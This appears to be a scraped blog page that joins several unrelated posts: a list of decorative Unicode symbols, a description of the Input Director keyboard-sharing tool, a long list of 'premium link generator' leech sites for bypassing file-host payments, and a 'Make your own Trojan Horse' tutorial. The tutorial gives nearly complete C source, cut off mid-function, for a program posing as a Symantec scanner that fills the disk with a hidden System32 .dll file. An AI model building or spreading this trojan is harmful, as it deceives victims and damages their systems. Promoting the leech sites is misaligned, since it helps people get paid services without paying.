facebook ASCII Symbols For Messenger Status

Do you like to decorate your instant messenger’s status with unique messages? Or once in a while you might notice some friends of yours placing some symbols in the chat boxes, status messages, etc. Here are some examples to give you an idea how these symbols look like
♫ ♬ ★ ☆ → ↓ → (◐ o ◑ ) (⊙…⊙ )
If you are wondering how these are done. Well it’s basically quite easy. These are ASCII symbols and they should work on majority of the sites and application out there, as long as they support text inputs.

Here’s a list of ASCII symbols we compiled that you can pick and use for your messenger status. Be creative ;-)
<font size=”+1″>
๑•ิ.•ั๑ ๑۩۞۩๑ ♬✿.。.:* ★ ☆ εїз℡❣·۰•●○●ōゃ ♥ ♡๑۩ﺴ ☜ ☞ ☎ ☏♡ ⊙◎ ☺ ☻✖╄ஐﻬ ► ◄ ▧ ▨ ♨ ◐ ◑ ↔ ↕ ▪ ▫ ☼ ♦ ▀ ▄ █▌ ▐░ ▒ ▬♦ ◊ ◦ ☼ ♠♣ ▣ ▤ ▥ ▦ ▩ ◘ ◙ ◈ ♫ ♬ ♪ ♩ ♭ ♪ の ☆ → あ ぃ £ ❤# @ & * ❁ ❀ ✿ ✾ ❃ ✺ ❇ ❈ ❊ ❉ ✱ ✲ ✩ ✫ ✬ ✭ ✮ ✰ ☆ ★ ✪ ¤ ☼ ☀ ☽ ☾ ❤ ♡ ღ☻ ☺ ❂ ◕ ⊕ ☉ Θ o O ♋ ☯ ㊝ ⊙ ◎◑ ◐ ۰ • ● ▪ ▫ 。 ゚ ๑ ☜ ☞ ☂ ♨ ☎ ☏ × ÷ = ≠ ≒ ∞ ˇ ± √ ⊥▶ ▷ ◀ ◁ ☀ ☁ ☂ ☃ ☄ ★ ☆ ☇ ☈ ☉ ☊ ☋ ☌ ☍ ☑ ☒☢ ☸ ☹ ☺ ☻ ☼ ☽ ☾ ♠ ♡ ♢ ♣ ♤ ♥ ♦ ♧ ♨ ♩ ✙ ✈ ✉ ✌ ✁♝ ♞♯♩♪♫♬♭♮ ☎ ☏ ☪ ♈ ♨ ₪ ™ ♂✿ ♥ の ↑ ↓ ← → ↖ ↗ ↙ ↘ ㊣ ◎ ○ ● ⊕ ⊙ ○  △ ▲ ☆ ★ ◇ ◆ ■ □ ▽ ▼ § ¥ 〒 ¢ £ ※ ♀ ♂ &⁂ ℡ ↂ░ ▣ ▤ ▥ ▦ ▧ ✐✌✍✡✓✔✕✖ ♂ ♀ ♥ ♡ ☜ ☞ ☎ ☏ ⊙ ◎ ☺ ☻ ► ◄ ▧ ▨ ♨ ◐ ◑ ↔ ↕ ♥ ♡ ▪ ▫ ☼ ♦ ▀ ▄ █ ▌ ▐ ░ ▒ ▬ ♦ ◊ ◘ ◙ ◦ ☼ ♠ ♣ ▣ ▤ ▥ ▦ ▩ ◘ ◙ ◈ ♫ ♬ ♪ ♩ ♭ ♪ ✄☪☣☢☠░ ▒ ▬ ♦ ◊ ◦ ♠ ♣ ▣ ۰•● ❤ ●•۰► ◄ ▧ ▨ ♨ ◐ ◑ ↔ ↕ ▪ ▫ ☼ ♦♧♡♂♀♠♣♥❤☜☞☎☏⊙◎ ☺☻☼▧▨♨◐◑↔↕▪ ▒ ◊◦▣▤▥ ▦▩◘ ◈◇♬♪♩♭♪の★☆→あぃ£Ю〓§♤♥▶¤๑⊹⊱⋛⋌⋚⊰⊹ ๑۩۩.. ..۩۩๑ ๑۩۞۩๑ ✲ ❈ ✿ ✲ ❈ ➹ ~.~ ◕‿- ❣ ✚ ✪ ✣ ✤ ✥ ✦❉ ❥ ❦ ❧ ❃ ❂ ❁ ❀ ✄ ☪ ☣ ☢ ☠ ☭ღღღ ▶ ▷ ◀ ◁ ☀ ☁ ☂ ☃ ☄ ★ ☆ ☇ ☈ ⊙ ☊ ☋ ☌ ☍ⓛⓞⓥⓔ๑•ิ.•ั๑ ๑۩۞۩๑ ♬✿ ☉♡ ♢ ♣ ♤ ♥ ♦ ♧ ♨ ♩ ✙✈ ✉ ✌ ✁ ✎ ✐ ❀ ✰ ❁ ❤ ❥ ❦❧ ➳ ➽ εїз℡❣·۰•●○●ゃōゃ♥ ♡๑۩ﺴ ☜ ☞ ☎ ☏♡ ⊙◎ ☺ ☻✖╄ஐﻬ ► ◄ ▧ ▨ ♨ ◐ ◑ ↔ ↕ ▪ ▫ ☼ ♦ ▀ ▄ █▌ ▐░ ▒ ▬♦ ◊ ◦ ☼ ♠♣ ▣ ▤ ▥ ▦ ▩ ◘ ◙ ◈ ♫ ♬ ♪ ♩ ♭ ♪ の ☆ → あ ぃ £ ❤ ❁ ❀ ✿ ✾ ❃ ✺ ❇ ❈ ❊ ❉ ✱ ✲ ✩ ✫ ✬ ✭ ✮ ✰ ☆ ★ ✪ ¤ ☼ ☀ ☽ ☾ ❤ ♡ ღ☻ ☺ ❂ ◕ ⊕ ☉ Θ o O ♋ ☯ ㊝ ⊙ ◎ ◑ ◐ ۰ • ● ▪ ▫ 。 ゚ ๑ ☜ ☞ ☂ ♨ ☎ ☏▶ ▷ ◀ ◁ ☀ ☁ ☂ ☃ ☄ ★ ☆ ☇ ☈ ☉ ☊ ☋ ☌ ☍ ☑ ☒☢ ☸ ☹ ☺ ☻ ☼ ☽ ☾ ♠ ♝ ♞♯♩♪♫♬♭♮ ☎ ☏ ☪ ♈ ♨ ºº ₪ ¤ 큐 « »™ ♂✿ ♥ の ↑ ↓ ← → ↖ ↗ ↙ ↘ ㊣ ◎ ○ ● ⊕ ⊙ ○  △ ▲ ☆ ★ ◇ ◆ ■ □ ▽ ▼ § ¥〒 ¢ £ ※ ♀ ♂ © ® ⁂ ℡ ↂ░ ▣ ▤ ▥ ▦ ▧ ✐✌✍✡✓✔✕✖ ♂ ♀ ♥ ♡ ☜ ☞ ☎ ☏ ⊙ ◎ ☺ ☻ ► ◄ ▧ ▨ ♨ ◐ ◑ ↔ ↕ ♥ ♡ ▪ ▫ ☼ ♦ ▀ ▄ █ ▌ ▐ ░ ▒ ▬ ♦ ◊ ◘ ◙ ◦ ☼ ♠ ♣ ▣ ▤ ▥ ▦ ▩ ◘ ◙ ◈ ♫ ♬ ♪ ♩ ♭ ♪ ✄☪☣☢☠㊊㊋㊌㊍㊎㊏ ㊐㊑㊒㊓㊔㊕㊖㊗㊘㊜㊝㊞㊟㊠㊡㊢ ㊣㊤㊥㊦㊧㊨㊩㊪㊫㊬㊭㊮㊯㊰✗✘✚✪✣✤✥✦✧✩✫✬✭✮✯✰ ✱✲✳❃❂❁❀✿✾✽✼✻✺✹✸✷ ✶✵✴❄❅❆❇❈❉❊❋❖☀☂☁【】┱ ┲ ❣ ✪ ✣ ✤ ✥ ✦ ❉ ❥ ❦ ❧ ❃ ❂ ❁ ❀ ✄ ☪ ☣ ☢ ☠ ☭ ♈ ➸ ✓ ✔ ✕ ✖ .: ◢ ◣ ◥ ◤ ▽ ▧ ▨ ▣ ▤ ▥ ▦ ▩ ◘ ◙ ▓ ▒ ░ ™ ℡ 凸 の ๑۞๑ ๑۩ﺴ ﺴ۩๑ o(‧”’‧)o ❆ べò⊹⊱⋛⋋ ⋌⋚⊰⊹ ⓛⓞⓥⓔ ☀ ☼ ☜ ☞ ⊙® ◈ ♦ ◊ ◦ ◇ ◆ εїз❃❂❁❀✿✾✽✼✻✺✹✸✷ ✶✵✴❄❅❆❇❈❉ ❊❋❖❤❥❦❧↔ ↕ ▪ → ︷╅╊✿ (¯`•._.• •._.•´¯)(¯`•¸•´¯) ❤`•.¸¸.•´´¯`•• .¸¸.•´¯`•.•●•۰• ••.•´¯`•.•• ••.•´¯`•.••—¤÷(`[¤* *¤]´)÷¤——(•·÷[ ]÷·•)— ①②③④⑤⑥⑦⑧⑨⑩ ⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳ ⒶⒷⒸⒹⒺⒻ ⒼⒽⒾⒿⓀⓁ ⓂⓃⓄⓅⓆⓇ ⓈⓉⓊⓋⓌⓍ ⓎⓏ ⓐⓑⓒⓓⓔⓕ ⓖⓗⓘⓙⓚⓛ ⓜⓝⓞⓟⓠⓡ ⓢⓣⓤⓥⓦⓧ ⓨⓩ(⊙▂⊙✖ )(づ  ̄ ³ ̄)づ ( c//”-}{-*\\x)(-’๏_๏’-)(◐ o ◑ )(⊙…⊙ )๏[-ิ_•ิ]๏(•ิ_•ิ)\(•ิ_•ิ\) (/•ิ_•ิ)(︶︹︺)
font>

EBOMB : A deadly virus

This summary is not available. Please click here to view the post.

Control Various Computers with a single mouse and a key board

Input Director is a Windows application that lets you control multiple Windows systems using the keyboard/mouse attached to one computer. It is designed for folks who have two (or more) computers next to each other and find themselves regularly switching from one system to the other. With Input Director, you can share a single keyboard/mouse across a set of systems. You switch which system receives the input either
by hotkey or by moving the cursor so that it transitions from one screen to the other (in a very similar fashion to a multi-monitor setup). The idea being that you can position the monitors from two or more systems in a row and use a shared keyboard/mouse to control all of them.

Input Director also supports a "shared" clipboard, in which you can copy data onto the clipboard on one system, transition across to another and paste.
Input Director requires Windows 2000 (Service Pack 4), Windows XP (Service Pack 2), Windows 2003, Windows Vista, Windows 2008 or Windows 7. The systems must be networked.

Features:

Easy to Use
# Easy to follow installation and usage guides - setup only takes a few minutes
# Tell Input Director how your monitors are positioned simply by dragging them to the correct spot on the monitor grid:
# Multi-monitor support
# Shared Clipboard - copy and paste between computers (including files!)
# Compatible with Windows 2000, XP, 2003, Vista, 2008 and Windows 7
# Transitioning control to another computer is a simple as moving your cursor off the screen on one computer for it to jump to the other
# Able to control a computer without needing to login to it first
# Supports Windows fast user switching
# Compatible with Vista User Account Control pop-ups

Manage all your computers at once
# Simultaneously lock all computers
# Synchronise the screensavers across your computers
# Synchronise shutdown of your system (or individually configure whether a computer goes to standby, hibernate or shuts down)
Security
# Encrypt network data between Input Director controlled computers using AES with a 128, 192 or 256bit key
# Lock down the Input Director configuration so that only Administrators may make changes
# Systems can limit which master systems can control them by host name, ip address or network subnet
Keyboard and Mouse Features
# Choose to use your mouse (speed, button order) preferences when directing another system
# Supports different keyboard layouts
# The keyboard LEDs (Caps Lock, Scroll Lock and Num Lock) reflect the status of the computer being controlled
# Mirror input - Broadcast mouse gestures and/or keyboard input to all computers simultaneously
# Keyboard macros - record a sequence of keystrokes that can then be run by hotkey. Macros can be broadcast to all computers, played on the system being controlled, or tied to a particular computer
# Key bindings - permanently bind a key to another key on a specified system
record a sequence of keystrokes that can then be run by hotkey. Macros can be broadcast to all computers, played on the system being controlled, or tied to a particular computer.



For the Usage Instructions Click here







Free Premium Link Generator | Rapidshare | Megaupload | Hotfile and more

I know how irritating it is to wait for nearly 13 minutes for just a 10 MB file.And the only option you have is to buy a premium account from that site or you a have to find a "Free Premium Cookie" for that site.Well,Premium Cookies are tough to get and most of them would have expired.But Premium Link generators are even better.You can download a file for free !







What are Premium Link Generators ?

Basically a premium link generating site uses a premium account and generates a premium link from that account and gives that link to you directly.So that you can download from the site premium's server for free.If you want to know more in depth.Try searching it Premium Link Generatos


Available Premium Link Generators ?

Well,I have seen and collected a few premium link generators for the below sites:

  1. Rapidshare Premium Link Generator
  2. Megaupload Premium Link Generator
  3. Hotfile Premium Link Generator
  4. Fileserve Premium Link Generator
  5. Filesonic Premium Link Generator
  6. Depositfiles Premium Link Generator
  7. Megavideo Premium Link Generator
  8. Sharecash Premium Link Generator

List of 100+ Free Premium Link Generators:

It was really tough to sort them out.So i just made a huge list.I check most of them and they are all 100% working.



http://rapid8.com
http://rapidgen.net
www.rapidthe.net/
www.premiumlinkgenerator.net/
www.hfplg.com/
www.megapid.com
rsplg.com/
rapidshare-premium-link-generator.com/
rapidrar.com/
www.megafast.info/
www.gigaleecher.com/
www.rsmaker.com/
www.rsmaker.com/
www.rsfox.com/
www.hlusoe.info/
www.megauploadpremiumlinkgenerator.org/

http://bajandogratis.com/
http://memory.dovantuyen.info/
http://www.descargasfull.com/
http://rapidleech.ir/
http://poyadl.ir/mamali2/
http://gawalmasr.com/RL/
http://leech.deeplabs.org/
http://nahwu.info/
http://rl.op3l.us/index.php
http://www.hishareserver1.powa.fr/
http://fullpremium.net/
http://www.rapidshot.info/
http://blackcrysis.de/rs/
http://visbb.com/
http://rsleecher.me/
http://www.downloadpremium.in/
http://www.aalireza.website.org/
http://www.vutuananh.com/rapid/
http://www.power-dll.com/
http://maimaiyeui.com/rs/
http://www.freerapidshareleech.com/
http://www.bajagratis.tk/
http://www.publicleecher.cz.cc/
http://rapidex.co.cc/
http://www.moxer.co.cc/
http://www.magon.co.cc/
http://rapid115.com/
http://premium.nextube.org/
http://mystikmomo.free.fr/rapidleech/
http://leech4url.co.cc/
http://karok.net.previewmysite.com/
http://www.warezpoint.info/
http://www.warezrocker-leecher.info/
http://www.botcollector.com/_marathon/leechfile/
http://leech.class07ct113.com/
http://www.linkregenerator.us/
http://www.speedytoys.net/loivedoncoi/
http://www.24honline.net/rapidleech/
http://nyuu.tk/leech/
http://nyaweb.co.cc/leech/
http://talegaleech.com/leech/
http://www.nsie.tk/leech/
http://www.eisn.tk/leech/
http://www.foxleech.com/
http://www.rsdad.com/index.php
http://lunex.info/
http://zleech.com/
http://www.onleech.net/
http://tom.x-files.lv/R/
http://mccallbrewery.com/
http://www.parsiancompany.com/
http://premiumaz.com/leech/
http://03134f9.netsolhost.com/r322/
http://66.197.161.117/r322/
http://easyrleech.tk/
http://www.descargasrapidshare.com/
http://www.rapidsharegratis.com/
http://www.rapidsharefreedownloads.com/
http://downloadspremium.com/
http://www.degitalinfo.com/uchm/
http://rapidleech2010.cz.cc/
http://www.gigaleecher.com/
http://www.leechking.com/
http://www.fastnfree4u.net/
http://youleech.net/
http://lunex.mrbrenna.com/
http://shot.rewaz.co.cc/
http://public.rapidgen.net/
http://www.megaleech.eu/
http://www.megaleech.us/
http://rsplg.com/
http://muplg.com/
http://hfplg.com/
http://www.hlusoe.info/rapidshare
http://www.hlusoe.info/megaupload
http://www.hlusoe.info/hotfile
http://www.hlusoe.info/storageto
http://www.hlusoe.info/uploading
http://www.hlusoe.info/fileserve

Make your own Trojan Horse


What is Trojan Horse?

In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
I am going to tell you about a Trojan horse which appears itself   antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
Here is the logic of the Trojan program:-
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.

How to compile, test and remove the damage?

Compilation:
You can use Borland C++ compiler (or equivalent) to compile the Trojan.
Testing:
To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
Here is the full source code of the program:-




Note:- This is totally intended for educational purpose only.


#include "stdio.h"
#include "conio.h"
#include "dos.h"
#include "stdlib.h"
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);
void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT..."